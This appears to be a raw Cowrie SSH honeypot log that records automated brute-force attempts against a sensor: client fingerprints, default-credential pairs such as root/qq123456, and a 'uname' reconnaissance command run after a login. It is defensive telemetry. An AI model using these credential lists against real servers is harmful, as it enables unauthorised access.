{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.427768Z","src_ip":"212.227.235.229","session":"b71963277d94"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":52776,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c4c41b44624","protocol":"ssh","message":"New connection: 41.226.27.251:52776 (1.2.3.4:22) [session: 2c4c41b44624]","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.888112Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.897894Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:21:56.936941Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.login.success","username":"root","password":"qq123456","message":"login attempt [root/qq123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:21:57.129297Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:21:57.242795Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:21:57.243553Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:57.294063Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:21:57.295267Z","src_ip":"41.226.27.251","session":"2c4c41b44624"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50558,"dst_ip":"1.2.3.4","dst_port":22,"session":"c66028bbe1d7","protocol":"ssh","message":"New connection: 212.227.235.229:50558 (1.2.3.4:22) [session: c66028bbe1d7]","sensor":"my-vps","timestamp":"2025-08-31T03:22:05.357774Z"}
{"eventid":"cowrie.session.closed","duration":"46.3","message":"Connection lost after 46.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:05.411022Z","src_ip":"212.227.125.160","session":"96315eebce88"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:22:05.464402Z","src_ip":"212.227.235.229","session":"c66028bbe1d7"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:22:05.465722Z","src_ip":"212.227.235.229","session":"c66028bbe1d7"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:22:08.771755Z","src_ip":"212.227.235.229","session":"c66028bbe1d7"}
{"eventid":"cowrie.session.closed","duration":"6.2","message":"Connection lost after 6.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:11.516539Z","src_ip":"212.227.235.229","session":"c66028bbe1d7"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":41692,"dst_ip":"1.2.3.4","dst_port":22,"session":"eeaa6e07a021","protocol":"ssh","message":"New connection: 41.226.27.251:41692 (1.2.3.4:22) [session: eeaa6e07a021]","sensor":"my-vps","timestamp":"2025-08-31T03:22:17.161671Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:22:17.162613Z","src_ip":"41.226.27.251","session":"eeaa6e07a021"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:22:17.205379Z","src_ip":"41.226.27.251","session":"eeaa6e07a021"}
{"eventid":"cowrie.login.failed","username":"user","password":"123456","message":"login attempt [user/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:22:17.334871Z","src_ip":"41.226.27.251","session":"eeaa6e07a021"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:18.550141Z","src_ip":"41.226.27.251","session":"eeaa6e07a021"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql123","message":"login attempt [mysql/mysql123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:22:20.871523Z","src_ip":"212.227.235.229","session":"b71963277d94"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55890,"dst_ip":"1.2.3.4","dst_port":22,"session":"45782d2229d9","protocol":"ssh","message":"New connection: 217.72.205.35:55890 (1.2.3.4:22) [session: 45782d2229d9]","sensor":"my-vps","timestamp":"2025-08-31T03:22:21.643618Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:21.644978Z","src_ip":"217.72.205.35","session":"45782d2229d9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52624,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5bb0d442d7b","protocol":"ssh","message":"New connection: 212.227.125.160:52624 (1.2.3.4:22) [session: a5bb0d442d7b]","sensor":"my-vps","timestamp":"2025-08-31T03:22:21.698369Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41024,"dst_ip":"1.2.3.4","dst_port":22,"session":"9fe259eb0234","protocol":"ssh","message":"New connection: 212.227.125.160:41024 (1.2.3.4:22) [session: 9fe259eb0234]","sensor":"my-vps","timestamp":"2025-08-31T03:22:26.769316Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:22:27.624772Z","src_ip":"212.227.125.160","session":"9fe259eb0234"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:22:27.629994Z","src_ip":"212.227.125.160","session":"9fe259eb0234"}
{"eventid":"cowrie.login.failed","username":"guest","password":"123456","message":"login attempt [guest/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T03:22:29.613509Z","src_ip":"212.227.125.160","session":"9fe259eb0234"}
{"eventid":"cowrie.session.closed","duration":"4.3","message":"Connection lost after 4.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:31.088963Z","src_ip":"212.227.125.160","session":"9fe259eb0234"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":49464,"dst_ip":"1.2.3.4","dst_port":22,"session":"6bf6dfb697dd","protocol":"ssh","message":"New connection: 41.226.27.251:49464 (1.2.3.4:22) [session: 6bf6dfb697dd]","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.405911Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.417181Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.451186Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.630798Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:22:37.736773Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.737444Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.784640Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:37.785925Z","src_ip":"41.226.27.251","session":"6bf6dfb697dd"}
{"eventid":"cowrie.session.closed","duration":"27.0","message":"Connection lost after 27.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:48.690894Z","src_ip":"212.227.125.160","session":"a5bb0d442d7b"}
{"eventid":"cowrie.session.closed","duration":"58.9","message":"Connection lost after 58.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:49.081803Z","src_ip":"212.227.235.229","session":"b71963277d94"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":50782,"dst_ip":"1.2.3.4","dst_port":22,"session":"1bf60947fb5f","protocol":"ssh","message":"New connection: 41.226.27.251:50782 (1.2.3.4:22) [session: 1bf60947fb5f]","sensor":"my-vps","timestamp":"2025-08-31T03:22:57.420053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:22:57.430789Z","src_ip":"41.226.27.251","session":"1bf60947fb5f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:22:57.463435Z","src_ip":"41.226.27.251","session":"1bf60947fb5f"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-31T03:22:57.636127Z","src_ip":"41.226.27.251","session":"1bf60947fb5f"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:22:58.893246Z","src_ip":"41.226.27.251","session":"1bf60947fb5f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":42880,"dst_ip":"1.2.3.4","dst_port":22,"session":"279892d4eaa7","protocol":"ssh","message":"New connection: 212.227.235.229:42880 (1.2.3.4:22) [session: 279892d4eaa7]","sensor":"my-vps","timestamp":"2025-08-31T03:23:00.974856Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39822,"dst_ip":"1.2.3.4","dst_port":22,"session":"852c649fb4cf","protocol":"ssh","message":"New connection: 212.227.125.160:39822 (1.2.3.4:22) [session: 852c649fb4cf]","sensor":"my-vps","timestamp":"2025-08-31T03:23:04.249306Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:23:04.250313Z","src_ip":"212.227.125.160","session":"852c649fb4cf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:23:04.502361Z","src_ip":"212.227.125.160","session":"852c649fb4cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58948,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e74a030c4bd","protocol":"ssh","message":"New connection: 212.227.235.229:58948 (1.2.3.4:22) [session: 8e74a030c4bd]","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.040930Z"}
{"eventid":"cowrie.login.failed","username":"infocare","password":"1111111","message":"login attempt [infocare/1111111] failed","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.539553Z","src_ip":"212.227.125.160","session":"852c649fb4cf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.679415Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.681137Z","src_ip":"212.227.235.229","session":"279892d4eaa7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:23:05.769379Z","src_ip":"212.227.235.229","session":"8e74a030c4bd"}
